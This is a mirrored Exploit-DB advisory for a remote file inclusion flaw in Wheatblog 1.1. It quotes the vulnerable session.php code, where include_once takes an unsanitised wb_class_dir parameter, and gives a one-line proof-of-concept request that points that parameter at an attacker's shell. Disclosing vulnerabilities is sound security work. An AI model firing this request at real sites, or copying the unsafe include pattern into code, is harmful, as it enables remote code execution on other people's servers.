exploit-db-mirror/platforms/php/webapps/2174.txt
Offensive Security f96ddba143 DB: 2016-09-02
2 new exploits

SAPID Blog beta 2 - (root_path) Remote File Inclusion
SAPID Gallery 1.0 - (root_path) Remote File Inclusion
SAPID Shop 1.2 - (root_path) Remote File Inclusion
SAPID Blog beta 2 - (root_path) Remote File Inclusion
SAPID Gallery 1.0 - (root_path) Remote File Inclusion
SAPID Shop 1.2 - (root_path) Remote File Inclusion

PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion

phNNTP 1.3 - (article-raw.php) Remote File Inclusion
Cwfm 0.9.1 - (Language) Remote File Inclusion
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC
Cwfm 0.9.1 - (Language) Remote File Inclusion
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC

PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion

PHPMyRing 4.2.0 - (view_com.php) SQL Injection

SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit

phpwcms 1.1-RC4 - (spaw) Remote File Inclusion
Spaminator 1.7 - (page) Remote File Inclusion
Thatware 0.4.6 - (root_path) Remote File Inclusion
Spaminator 1.7 - (page) Remote File Inclusion
Thatware 0.4.6 - (root_path) Remote File Inclusion

phpPrintAnalyzer 1.2 - Remote File Inclusion

Wheatblog 1.1 - (session.php) Remote File Inclusion

phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit

WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload

FortiClient SSLVPN 5.4 - Credentials Disclosure
2016-09-02 05:08:35 +00:00

41 lines
1.3 KiB
Text
Executable file

###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #
# < www.Aria-security.net > #
# Gr33t to: A.u.r.a & l2odon & DrtRp & Sh3ll #
###########################################################################################
<?php
include_once("$wb_class_dir/classDatabase.php");
function Start_Session()
{
global $session_dir;
if ( $session_dir != '' )
session_save_path($session_dir);
if ( ! isset($_SESSION) )
{
session_start();
// Supposedly a fix for IE6
header('Cache-control: private');
My_Cache();
if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) != 'resource')
touchDatabaseSession();
}
}
***********************************************************************
Proof of Concept:
server/includes/session.php?wb_class_dir=SHELL
Contact : Outlaw@aria-security.net
# milw0rm.com [2006-08-11]